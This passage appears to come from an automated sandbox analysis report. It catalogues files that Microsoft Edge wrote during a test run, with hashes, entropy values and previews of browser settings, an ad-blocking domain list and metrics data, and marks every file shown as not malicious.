                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9bfc425c-961c-45e7-afd1-46d8d1677b3b.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.09515843332724
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVNxxTU4P6KJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynEXi9t6KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:619AB52F00800C714E1CB4738CAC6F2D
                                                                                                                                                                                                                                                                                                        SHA1:827F20CEC8220A2E5945192445C2886131311D21
                                                                                                                                                                                                                                                                                                        SHA-256:A126B16BD25778062B2264D04DE2C4C02A7089584A6CA1AB987D9DE35D880DE9
                                                                                                                                                                                                                                                                                                        SHA-512:4B85D0267C0518E7BA270A2F7F654C865ACB42950C3E23FFBB4442C336576D3ECC2CC95CBE200A3BA44DC25B3A7F92868AE5A66ED214EE159223B8B09B9482CC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\04dbd04c-995d-4985-870e-d1584fc9ea5c.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                        MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                        SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                        SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                        SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                        MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                        SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                        SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                        SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676AFD38-8DC.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.04463337709027542
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:Wpi0m5tm6nOAt6YoJgA8x5XSggykfhbNNETeIC/0TQsdiRbmn8y08Tcm2RGOdB:mi0Utpigk9hZJWJiE08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:86B6431DCB15EBC6A16BB38B3B84B49F
                                                                                                                                                                                                                                                                                                        SHA1:AF889C5A058AB79B43065DB86B46902D30470B6E
                                                                                                                                                                                                                                                                                                        SHA-256:E9DE0885C3A33FA068A5847B5CD61BCDCD0F48C938A9F40826F49585A80EDBDB
                                                                                                                                                                                                                                                                                                        SHA-512:2CDA7A3BA0732ECFA7DA9886F2A2A4E3782F2656D2E5E6BEB75F19421A5DA0E7FAB39B149D8AA487B3079594ED5DE75282D6CFB946D73F7C6366D876E4965504
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................d...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".uleciv20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........9...... .2.......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676AFD42-1128.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.04523041212895212
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:FPsy0m5tm5nOAt6YcJWpjrZXpAgiT5jhxjNEK4IQdGRQ8RIsRNSn8y08Tcm2RGOD:9X0UtqqqN2hRcuiSo08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:3A825AE9A409EB5E0426EB2F8D487811
                                                                                                                                                                                                                                                                                                        SHA1:D7C021A8C6AD702ABD9216D1274DF1465B3806BC
                                                                                                                                                                                                                                                                                                        SHA-256:7EB96535419B2CB36F20184A3B83E7D39A795B14E5F3AC46F707BDB4D500B8EE
                                                                                                                                                                                                                                                                                                        SHA-512:477A09AAC40F552C2B525DC83E2107E7B516C501179912C06E46CC68D976841C5AB1DBD162513417796C78BB8496126D21748A8C579921B8DAE682EE9C15318E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................f...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".uleciv20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U..G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676AFD43-197C.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4725669323069106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:mO9ZjS89XW0WPQrgKUxevRcF2iIyv7/Nd7BXnq6toDJPr2g1HFfo:/ZjRtgKUxURcF/jNlBXnqHDJPr2aHt
                                                                                                                                                                                                                                                                                                        MD5:A7B45E7C20CA636AE6EC274A66382804
                                                                                                                                                                                                                                                                                                        SHA1:FE32A30BACAEAA3FDC0F69F4B5AD109F6B32E876
                                                                                                                                                                                                                                                                                                        SHA-256:6E52F5362B3747E5A23040A6BEE06F581F3A1F2C3131402B2A08E405B234F9FA
                                                                                                                                                                                                                                                                                                        SHA-512:ABECBCBD9EE8CF564B9514C63B4D46517045BBB8A37588A89F2F91352F2FE30C6601A468A85760255476676A38D5BD4B21230A8028A33A3FD30A9CD0109FA5F9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................N...N..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".uleciv20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2.........

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.095798522334989
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJH:o1cUh4Y3LbO/BVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                                                        MD5:9F5D8B818C6B2789F5431CE5910342F0
                                                                                                                                                                                                                                                                                                        SHA1:E2F29B4FF99E6C4374DF928837D5461D2D22B52A
                                                                                                                                                                                                                                                                                                        SHA-256:39DCB8CCA33A46C13D75F4B53D9823215501BA1DCF8E6EE8136DBCA706767DC0
                                                                                                                                                                                                                                                                                                        SHA-512:D2C01F75786F51E7CE8405122FE87AD8CC26B30BFA347A98541BFE1ACB6403934948D7BC1790E8EB917D7AAC3671C79FF29E57803C7552A6250B1BB6A4D264DB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\24556937-3d9b-43ec-a269-e627ca8d60f7.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):38627
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.555030976031749
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQmzIVW6L7pLGLh24W5wSgf4Hl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP/EIVqUpZ:YlcVNdch24WaSgfQlu1jaqb/a7k8a3tp
                                                                                                                                                                                                                                                                                                        MD5:FB7D18FC1E4377ABE6DC27C205DF083A
                                                                                                                                                                                                                                                                                                        SHA1:B15D4DE3C2E46DACCA8DEBD36684975D4C25E6ED
                                                                                                                                                                                                                                                                                                        SHA-256:87B38406684118E9F52CB67CC9D5916529852F2EE49B523AF9C871307153C711
                                                                                                                                                                                                                                                                                                        SHA-512:201BE3AC46CF51AB9EE8FB6B9AF29951E7D0C5F7BCB880029964C4F856237B40F195F3E1F7D9B4A6B6A8B52C947774C7CD56C66426A9ED9F125B1779BF76C565
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6bcb4022-9ac0-4e0f-a3c1-c5d5fd4638b9.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (16987), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16989
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.442761919000962
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXJ99QTryDigabatSuypTsvVaFvrE9kVNUNffwhtngS7yjasW8ObV+Fh/Qwvese:stXPGKSu4TsvVCDuQgRkbG1QwvAd
                                                                                                                                                                                                                                                                                                        MD5:27A6C3301FC66379D8B43EAFFE55272B
                                                                                                                                                                                                                                                                                                        SHA1:8DD7045965F53C556C9C4E21AEAF51F1B476CE26
                                                                                                                                                                                                                                                                                                        SHA-256:E144C17214CA57BE278FE9F64223A543FF8408D22FAECE3EEADC38A29515CB4B
                                                                                                                                                                                                                                                                                                        SHA-512:4E59B29EE6832E70E04A8DD74D56F8A7BBD3F3BB10A8B69FEF3D327B46EEF29E965AFF6E5AD79FE8D5D6F10165425E51E61F5FA17452A14E5DF9F55D1C7A76A0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7073b031-c5f9-4716-bb6a-57b4191cdeab.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9756
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108335505712741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXkdpTsvVaFvrE9kJcW8ObV+Fh/QAsU5PCYJ:stXQTsvVCD5bG1QKd
                                                                                                                                                                                                                                                                                                        MD5:7966B4938865BBADF89F5840E6D8A0A8
                                                                                                                                                                                                                                                                                                        SHA1:C4A33ADF1A37A56CA7ABC7FE93B9456F75FFBE61
                                                                                                                                                                                                                                                                                                        SHA-256:2B1263B97D8721D6CDD31345CC48C5B837DAFD5075555A3C876F9CF49662DFC5
                                                                                                                                                                                                                                                                                                        SHA-512:27F40F81F1755085720EFA1D8B6354AB89CC9CF844DF0CD44E4D5BCDA8887DD2F3F1D583ECB715D420336DF97F4145BB5A60A64107586F278E2D6D32EECF796D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9f8edf8e-aa66-4c7e-a18f-06e057fd4cd6.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
